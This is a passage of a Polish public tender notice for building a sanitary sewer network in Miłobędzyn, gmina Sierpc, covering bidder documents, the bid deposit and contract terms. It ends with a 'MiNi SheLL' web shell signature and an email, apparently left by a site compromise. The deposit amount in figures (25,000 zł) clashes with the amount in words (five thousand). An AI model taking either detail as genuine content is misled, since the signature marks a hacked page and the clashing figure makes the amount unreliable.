1 ustawy PZP (zgodnie z treścią załącznika nr 3 do SWZ); <br/>2. Oświadczenie Podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu <br/> z postępowania (zgodnie z treścią załącznika nr 3a do SWZ);<br/>3. Odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji <br/> i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 Ustawy pzp, <br/> sporządzonych nie wcześniej niż 3 miesiące przed jej założeniem, jeżeli odrębne przepisy <br/> wymagają wpisu do rejestru lub ewidencji.<br/>4. Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że <br/> wykonawca nie zalega z opłaceniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 <br/> ustawy, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku <br/> zalegania z opłaceniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda <br/> złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu <br/> składania ofert wykonawca dokonał płatności należnych podatków lub opłat <br/> wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych <br/> należności;<br/>5. Zaświadczenie albo inny dokument właściwej terenowej jednostki <br/> organizacyjnej Zakładu ubezpieczeń Społecznych lub właściwego oddziału <br/> regionalnego lub właściwej placówki terenowej kasy Rolniczego ubezpieczenia <br/> Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek <br/> na ubezpieczenia społeczne i zdrowotne w zakresie art. 109 ust. 1 pkt 1 ustawy, <br/> wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku <br/> zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne <br/> wraz z zaświadczeniem albo innym dokumentem zamawiający żąda aby przed upływem <br/> terminu składania ofert wykonawca dokonał płatności należnych składek <br/> na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł <br/> wiążące porozumienie w sprawie spłat tych należności.<br/>6. Opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że <br/> wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej <br/> działalności związanej z przedmiotem zamówienia na sumę gwarancyjną <br/> min. 300.000,00 zł (przez „opłaconą” polisę Zamawiający rozumie załączenie do oferty <br/> wraz z polisą ubezpieczeniową dowodu potwierdzającego uiszczenie składki za tą polisę <br/> ubezpieczeniową od odpowiedzialności cywilnej w zakresie prowadzonej działalności <br/> związanej z przedmiotem zamówienia);<br/>7. Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, <br/> o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia<br/> z postępowania wskazanych przez zamawiającego, o których mowa w: <br/>a) art. 108 ust. 1 - 6 ustawy, <br/>b) art. 109 ust. 1 pkt 1 ustawy, odnośnie do naruszenia obowiązków dotyczących płatności <br/> podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. <br/> o podatkach i opłatach lokalnych (j.t.: Dz. U. z 2019 r. poz. 1170 z późn. zm.), <br/>c) art. 109 ust. 1 pkt 5,7 i 10 ustawy. <br/> Wzór oświadczenia o aktualności informacji zawartych w oświadczeniu, o którym mowa <br/> w art. 125 ust. 1 ustawy Pzp stanowi załącznik nr 10 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu <br/> – składane na podstawie art. 125 ust. 1 ustawy PZP (zgodnie z treścią załącznika nr 2 <br/> do SWZ);<br/>2. Oświadczenie Podmiotu udostępniającego zasoby dotyczące spełniania warunków <br/> udziału w postępowaniu (zgodnie z treścią załącznika nr 2a do SWZ).<br/>3. Zobowiązanie innego podmiotu do oddania do dyspozycji Wykonawcy niezbędnych <br/> zasobów na okres korzystania z nich przy wykonywaniu zamówienia (zgodnie <br/> z treścią załącznika nr 5 do SWZ);<br/>4. Wykaz robót budowlanych obejmujący wykonanie co najmniej 2 (dwóch) <br/> robót budowlanych polegających na budowie, modernizacji lub przebudowie kanalizacji <br/> sanitarnej o wartości – nie mniejszej niż 1.000.000,00 zł (brutto) wykonanej nie <br/> wcześniej niż w okresie ostatnich 5 (pięciu) lat przed upływem terminu <br/> składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.<br/> Zamawiający dokona oceny spełnienia warunku w oparciu o uzupełniony przez <br/> wykonawcę – wykaz robót budowlanych– (zgodnie z załącznikiem nr 7 do SWZ)<br/> oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane <br/> należycie, oraz wskazujących czy zostały wykonane zgodnie z zasadami sztuki <br/> budowlanej i prawidłowo ukończone przy czym dowodami, o których mowa, są <br/> referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty <br/> budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie <br/> jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty.<br/>5.Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, <br/> wskazujący w szczególności - co najmniej jedną osobą posiadającą uprawnienia <br/> budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, <br/> wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych. <br/> Wykaz powinien obejmować rodzaj specjalności, imię i nazwisko osoby, która będzie <br/> posiadać w/w uprawnienia, informację dotyczącą podstawy dysponowania <br/> osobą, kwalifikacje zawodowe, numer uprawnień budowlanych wraz z ich szczegółowym <br/> zakresem, datę wydania uprawnień oraz nazwę organu który wydał uprawnienia <br/> uprawniające do wykonywania samodzielnych funkcji technicznych w budownictwie.<br/> (zgodnie z załącznikiem nr 8 do SWZ). Do wykazu należy dołączyć <br/> dokumenty potwierdzające posiadanie uprawnień budowlanych w specjalności <br/> instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, <br/> gazowych, wodociągowych i kanalizacyjnych oraz dokumenty potwierdzające <br/> posiadanie tych uprawnień.<br/> Wskazany wyżej wykaz personelu Wykonawcy stanowi jedynie minimalne wymagania<br/> dla spełnienia warunku udziału w postępowaniu.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> . Oferta winna być zabezpieczona wadium w wysokości 25.000,00 zł <br/> (słownie: pięć tysięcy złotych 00/100).<br/><br/>2. Wadium wnosi się przed upływem terminu składania ofert, w szczególności wadium<br/> w formie pieniężnej winno wpłynąć na konto Zamawiającego przed upływem terminu <br/> składania ofert. <br/><br/>3. Wadium musi obejmować okres związania ofertą tj. do dnia 19.05.2022 roku licząc <br/> od dnia upływu terminu składania ofert. <br/><br/>4. Wykonawca może wnieść wadium w: <br/>a) pieniądzu, <br/>b) gwarancjach bankowych, <br/>c) gwarancjach ubezpieczeniowych, <br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy <br/> z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości<br/> (j.t.: Dz. U. z 2020 r. poz. 299).<br/><br/>5. W przypadku wnoszenia wadium w pieniądzu Wykonawca jest zobowiązany wpłacić <br/> wadium przelewem na rachunek Zamawiającego: Bank Spółdzielczy w Starej Białej <br/> Oddział w Sierpcu, nr konta: 52 9015 0001 2005 0000 0521 0012, z dopiskiem na <br/> przelewie: <br/> „Wadium na zabezpieczenie oferty Wykonawcy………………………………………<br/> dotyczącej zamówienia p.n.: „Budowa sieci kanalizacji sanitarnej w m. Miłobędzyn, <br/> gmina Sierpc, powiat Sierpecki”.<br/><br/>6. Za skuteczne wniesienie wadium w pieniądzu Zamawiający uważa wadium, które <br/> w wyznaczonym terminie składania ofert znajduje się na wskazanym rachunku bankowym <br/> Zamawiającego. <br/><br/>7. Zamawiający wymaga załączenia do oferty dokumentu potwierdzającego wniesienie <br/> wadium w pieniądzu na rachunek bankowy Zamawiającego. <br/><br/>8. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. <br/><br/>9. W przypadku wadium wnoszonego w innej formie niż w pieniądzu, wykonawca składa <br/> oryginał dokumentu w postaci elektronicznej załączając go do oferty. Dokument ten <br/> powinien być podpisany kwalifikowanym podpisem elektronicznym przez jego wystawcę. <br/> Z treści dokumentu (gwarancji, poręczenia) winno wynikać bezwarunkowe, na każdym <br/> pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, <br/> zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku <br/> Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo <br/> do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. <br/> Pełnomocnictwo winno być załączone do oferty.<br/><br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, <br/> oświadczenia, o których mowa w Rozdziale XIV pkt. 2.1. i 2.2.<br/> SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw <br/> wykluczenia oraz oświadczenie o spełnianiu warunków udziału w zakresie, w jakim każdy <br/> z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/><br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty <br/> oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni <br/> wykonawcy zgodnie z załącznikiem nr 4 do SWZ.<br/><br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania <br/> składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Strony przewidują możliwość dokonywania zmian postanowień niniejszej umowy.<br/>2. W przypadku każdej zmiany, o której mowa powyżej, po stronie wnoszącego <br/> propozycję zmian leży uzasadnienie powstałej okoliczności, a wniosek o zmianę <br/> postanowień umowy musi być wyrażony na piśmie.<br/>3. Zmiana niniejszej umowy musi być zgodna z art. 455 ustawy Pzp oraz wymaga zgody obu <br/> Stron oraz pisemnego aneksu podpisanego przez strony pod rygorem nieważności.<br/>4. Strony dopuszczają możliwość zmiany postanowień zawartej umowy oraz przewidują <br/> możliwość dokonania w umowie zmian, w szczególności w sytuacji zaistnienia jednej <br/> lub kilku z poniższych okoliczności:<br/>1) wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym <br/> wpływ na realizację przedmiotu umowy (wprowadzonych po dniu zawarcia umowy); <br/>2) w zakresie dotyczącym zmiany wynagrodzenia w przypadku ustawowej zmiany stawki <br/> podatku od towarów i usług (VAT); Wynagrodzenie należne Wykonawcy zostanie <br/> odpowiednio zmienione w stosunku wynikającym ze zmienionej stawki podatku <br/> od towarów i usług (VAT);<br/>3) wystąpienia konieczności zmiany osób wskazanych w ofercie (śmierć, choroba, ustania <br/> stosunku pracy lub inne zdarzenia losowe lub inne przyczyny niezależne od Wykonawcy) <br/> przy pomocy, których Wykonawca realizuje przedmiot umowy; <br/>4) w przypadku zmiany danych Wykonawcy lub Zamawiającego – w szczególności: zmiana <br/> adresu, zmiana nazwy, zmiana numeru rachunku bankowego, zmiany NIP, REGON;<br/>5) zmiana terminu realizacji przedmiotu umowy z przyczyn niezależnych od Wykonawcy, <br/> a w szczególności: <br/>a) okoliczności leżących po stronie Zamawiającego, tj. między innymi wstrzymania robót <br/> przez Zamawiającego; <br/>b) odmowy lub opóźnienia wydania przez organy administracji lub inne podmioty <br/> wymaganych decyzji, zezwoleń, uzgodnień, opinii z przyczyn niezawinionych przez <br/> Wykonawcę; <br/>c) wystąpienia długotrwałych, niekorzystnych warunków atmosferycznych, odbiegających od <br/> typowych dla pory roku lub utrzymujących się przez dłuższy okres czasu, co uniemożliwia <br/> prowadzenie robót budowlanych z uwagi na uwarunkowania techniczne i technologiczne <br/> wynikające z norm;<br/>d) zmian spowodowanych nieprzewidzianymi warunkami geologicznymi, archeologicznymi <br/> lub terenowymi, w szczególności: niewypały i niewybuchy, wykopaliska archeologiczne; e) odmiennych (ale istotnych dla realizacji) od przyjętych w dokumentacji projektowej <br/> warunków terenowych, w szczególności istnienie nie zinwentaryzowanych lub błędnie <br/> zinwentaryzowanych elementów budowlanych; <br/>f) przyczyn niezależnych od stron umowy, które będą skutkowały koniecznością <br/> zastosowania innych rozwiązań, gdy zastosowanie rozwiązań przewidzianych <br/> w dokumentach zamówienia groziłoby niewykonaniem lub wadliwym wykonaniem <br/> Umowy; <br/>g) wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo <br/> zachowania należytej staranności; <br/>h) wystąpienia przeszkody o obiektywnym charakterze (zdarzenia nadzwyczajne, zewnętrznej <br/> niemożliwe do zapobieżenia, a więc mieszczące się w zakresie pojęciowym tzw. siły <br/> wyższej) i inne zdarzenia, których przyczyny nie leżą po żadnej ze stron umowy, takie jak: <br/> nadzwyczajne zjawiska przyrody (m.in. trzęsienia ziemi, huragany) zdarzenia wywołane <br/> przez człowieka, (np. działania wojenne, gwałtowne rozruchy oraz akty władzy <br/> publicznej), którym należy się podporządkować, a także inne niemożliwe do przewidzenia <br/> przyczyny techniczne; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-20 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-20 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com